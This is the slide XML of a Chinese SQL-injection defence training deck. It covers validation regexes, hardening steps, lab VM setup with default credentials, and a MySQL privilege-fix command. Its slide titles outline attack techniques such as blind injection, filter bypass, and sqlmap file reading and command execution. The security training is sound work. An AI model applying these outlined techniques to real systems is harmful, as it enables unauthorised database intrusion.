            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>账号名：^[a-zA-Z][a-zA-Z0-9_]{4,15}$</a:t>
            </a:r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：^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>IP地址：((?:(?:25[0-5]|2[0-4]\\d|[01]?\\d?\\d)\\.){3}(?:25[0-5]|2[0-4]\\d|[01]?\\d?\\d))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编码规范 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>预编译查询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8" y="1193370"/>
            <a:ext cx="9093138" cy="259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067" y="2578099"/>
            <a:ext cx="6743700" cy="3914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2984" y="39225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Java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3475" y="4690217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PHP =》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初步认识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01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配置加固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关闭报错信息显示</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关闭调试模式、报错等信息，增加黑客检测、利用的难度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报错信息包含全局配置、文件级配置、局部异常信息打印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禁用高危函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>禁用执行命令、读写文件等高危函数，降低黑客入侵所带来的影响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降低账号权限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应用中采用数据库普通用户连接数据库，低权限账号操作有所限制，比如无法读取数据库密码，有的类型数据库无法读写文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库进程采用普通用户运行，读写文件、执行系统命令时只能进行一些普通用户的操作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275" y="6316345"/>
            <a:ext cx="1179893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注意：配置加固并不能防范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SQL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注入攻击，但可以降低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SQL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注入所带来的影响，增加黑客利用难度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配置加固</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解决靶机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>bug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381742"/>
            <a:ext cx="11082491" cy="48681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因为之前模板删错权限，出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户无法执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GRANT 操作，可按照以下修复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#mysql -pnsfocus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&gt;UPDATE mysql.user SET Grant_priv = 'Y' WHERE User='root';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FLUSH PRIVILEGES;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&gt;exit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#systemctl restart mariadb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回顾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的危害</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="内容占位符 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1069975" y="1262857"/>
          <a:ext cx="10052050" cy="501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165" y="2308860"/>
            <a:ext cx="5295265" cy="1461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9600"/>
              <a:t>答疑时间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实操演练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导入实操虚拟机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193370"/>
            <a:ext cx="11082491" cy="486813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VMware Workstations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注入测试靶机为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包，安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VMware Workstations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>完成之后，直接双击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包即可导入，导入后直接开机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击虚拟机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载后为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>压缩包，解压后，双击目录下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>vmx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件即可注册到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VMware Workstations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用，注册后将网络修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式，然后开机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78" y="3546188"/>
            <a:ext cx="4691018" cy="321780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注入测试靶机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193370"/>
            <a:ext cx="11082491" cy="4868138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>登录密码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nsfocus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，可以直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssh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开机后可从界面看到该虚拟机的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尝试访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://ip/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（不需要带任何端口）测试是否能够访问</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>链接中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>替换成自己虚拟机真实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，实操题目中的类似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9715"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2944073" y="3182729"/>
            <a:ext cx="5886450" cy="350008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kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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193370"/>
            <a:ext cx="11082491" cy="4868138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>登录密码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali/kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开机后，从界面登录，打开终端，输入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ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>测试，测试是否能够与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入测试靶机通讯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09" y="2665931"/>
            <a:ext cx="59721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kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - ssh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77" y="1193370"/>
            <a:ext cx="11082491" cy="4868138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为了安全，先通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sudo systemctl enable --now ssh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>登录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24860"/>
            <a:ext cx="3717925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9545"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4864735"/>
            <a:ext cx="3717925" cy="1156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130" y="2590165"/>
            <a:ext cx="5644515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安装xampp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072005"/>
            <a:ext cx="4982845" cy="4243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26739" y="137646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40" y="2072005"/>
            <a:ext cx="5881370" cy="3817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18674" y="137646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启动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SQL数据交互流程</a:t>
            </a:r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2079" y="1763338"/>
            <a:ext cx="10309518" cy="402786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部署</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sqli-labs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9600" y="1525905"/>
            <a:ext cx="524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①清空C:\xampp\htdocs里面的文件，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqli-libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解压到该目录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" y="2367915"/>
            <a:ext cx="5441315" cy="3289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6785" y="1525905"/>
            <a:ext cx="612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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>②访问http://localhost/phpmyadmin/server_sql.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行CREATE DATABASE security;创建数据库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85" y="2367915"/>
            <a:ext cx="5708650" cy="3573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1950" y="6137910"/>
            <a:ext cx="710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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>③访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1/sql-connections/setup-db.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>初始化数据库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165" y="2308860"/>
            <a:ext cx="5295265" cy="1461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9600" dirty="0"/>
              <a:t>实操演示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2031" y="5077205"/>
            <a:ext cx="7890409" cy="441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根据实操题目的内容进行演示，演示后学员进行实操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4509" y="1969514"/>
            <a:ext cx="7287491" cy="157535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88340" y="1336675"/>
            <a:ext cx="6074410" cy="5013325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="450850" indent="-450850">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入定义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"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Clr>
                <a:srgbClr val="68B92E"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于程序中对用户输入检查不严格，用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，即</a:t>
            </a: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注入。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"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Clr>
                <a:srgbClr val="68B92E"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入的本质</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"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Clr>
                <a:srgbClr val="68B92E"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对于输入检查不充分，导致</a:t>
            </a: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语句将用户提交的非法数据当作语句的一部分来执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="+mn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52" y="1825625"/>
            <a:ext cx="4379882" cy="372401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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入的危害</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="内容占位符 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1069975" y="1262857"/>
          <a:ext cx="10052050" cy="501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JmNmFhZDBmNmMyZDY0OGQ4MDRhNGI5YzIyZmU1Z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069,&quot;width&quot;:102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64,&quot;width&quot;:829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0,&quot;width&quot;:829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43.089763779528,&quot;width&quot;:16235.46141732283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80,&quot;width&quot;:1563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2366ba-a8dc-4913-99d4-c67c5641518c}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="872*324"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="48*108*872*3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f766e2-ce4d-4a46-bd72-23399413517e}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="872*385"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="48*108*872*38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567f8b-2840-4e77-a495-220dc1eaa559}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="872*355"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="48*108*872*355"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office 主题​​">
  <a:themeElements>
    <a:clrScheme name="白色模板色系">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="A6A6A6"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="606060"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="68B92E"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E77817"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFC000"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="3BB3C2"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="667AB3"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="004738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A000120150822A22KPBG</Template>
  <TotalTime>195</TotalTime>
  <Words>4820</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>423</Paragraphs>
  <Slides>72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等线</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>Web安全主题 SQL注入攻击防范培训</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>温馨提示：请勿进行非授权渗透测试</vt:lpstr>
      <vt:lpstr>课程大纲</vt:lpstr>
      <vt:lpstr>实操所需工具</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>SQL数据交互流程</vt:lpstr>
      <vt:lpstr>什么是SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入的危害</vt:lpstr>
      <vt:lpstr>关于SQL注入的历史安全事件</vt:lpstr>
      <vt:lpstr>暗网售卖数据</vt:lpstr>
      <vt:lpstr>SQL注入产生原因</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>SQL注入攻击基础 - 参数类型分类</vt:lpstr>
      <vt:lpstr>SQL注入攻击基础 - 通用检测方式</vt:lpstr>
      <vt:lpstr>SQL注入攻击基础 - 回显类型分类</vt:lpstr>
      <vt:lpstr>SQL注入攻击基础 - 不同类型盲注的优劣势</vt:lpstr>
      <vt:lpstr>常见SQL注入 - 单引号报错注入</vt:lpstr>
      <vt:lpstr>常见SQL注入 - 基于报错回显</vt:lpstr>
      <vt:lpstr>常见SQL注入 - “万能密码”登录</vt:lpstr>
      <vt:lpstr>常见SQL注入 – 基于布尔的盲注</vt:lpstr>
      <vt:lpstr>常见SQL注入 – 基于时间的盲注</vt:lpstr>
      <vt:lpstr>常见SQL注入 – 基于dnslog盲注</vt:lpstr>
      <vt:lpstr>常见SQL注入 - 联合查询</vt:lpstr>
      <vt:lpstr>常见SQL注入 - 堆叠查询注入</vt:lpstr>
      <vt:lpstr>进阶利用(绕过) - 为什么需要绕过</vt:lpstr>
      <vt:lpstr>进阶利用(绕过) - 注释过滤绕过</vt:lpstr>
      <vt:lpstr>进阶利用(绕过) - 逻辑运算过滤绕过</vt:lpstr>
      <vt:lpstr>进阶利用(绕过) - 空格过滤绕过</vt:lpstr>
      <vt:lpstr>进阶利用(绕过) - union和select过滤绕过</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>手动渗透工具 - burpsuite</vt:lpstr>
      <vt:lpstr>手动渗透工具 - burpsuite</vt:lpstr>
      <vt:lpstr>手动渗透工具 - burpsuite</vt:lpstr>
      <vt:lpstr>手动渗透工具 - burpsuite</vt:lpstr>
      <vt:lpstr>手动渗透工具 - burpsuite</vt:lpstr>
      <vt:lpstr>手动渗透工具 - burpsuite</vt:lpstr>
      <vt:lpstr>自动渗透工具 - sqlmap</vt:lpstr>
      <vt:lpstr>自动渗透工具 - sqlmap</vt:lpstr>
      <vt:lpstr>自动渗透工具 - sqlmap</vt:lpstr>
      <vt:lpstr>sqlmap - 检测是否存在注入</vt:lpstr>
      <vt:lpstr>sqlmap - 指定注入点、DBMS进行检测</vt:lpstr>
      <vt:lpstr>sqlmap - 从日志文件发起检测</vt:lpstr>
      <vt:lpstr>sqlmap - 获取数据库名、数据库表、数据库字段</vt:lpstr>
      <vt:lpstr>sqlmap - 获取数据库中的数据 </vt:lpstr>
      <vt:lpstr>sqlmap - 运行自定义sql语句</vt:lpstr>
      <vt:lpstr>sqlmap - 获取数据库所有用户</vt:lpstr>
      <vt:lpstr>sqlmap - 获取并破解数据库密码</vt:lpstr>
      <vt:lpstr>sqlmap - 读取系统文件</vt:lpstr>
      <vt:lpstr>sqlmap - 写入系统文件</vt:lpstr>
      <vt:lpstr>sqlmap - 执行系统命令</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>设备防护</vt:lpstr>
      <vt:lpstr>编码规范 – 关键字过滤（黑名单过滤）</vt:lpstr>
      <vt:lpstr>编码规范 – 参数校验（白名单校验）</vt:lpstr>
      <vt:lpstr>编码规范 – 预编译查询</vt:lpstr>
      <vt:lpstr>配置加固</vt:lpstr>
      <vt:lpstr>配置加固 - 解决靶机的bug</vt:lpstr>
      <vt:lpstr>回顾SQL的危害</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>导入实操虚拟机</vt:lpstr>
      <vt:lpstr>SQL注入测试靶机</vt:lpstr>
      <vt:lpstr>kali虚拟机</vt:lpstr>
      <vt:lpstr>kali虚拟机 - ssh登录</vt:lpstr>
      <vt:lpstr>Windows安装xampp</vt:lpstr>
      <vt:lpstr>Windows部署sqli-labs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2016PPT模板风格</dc:title>
  <dc:creator>zhaoyuan</dc:creator>
  <cp:lastModifiedBy>kuli zhong</cp:lastModifiedBy>
  <cp:revision>473</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-29T01:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-18T07:39:41Z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C156F8F4E633429497495DE061A59792</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.12302</vt:lpwstr>
  </property>
</Properties>
</file>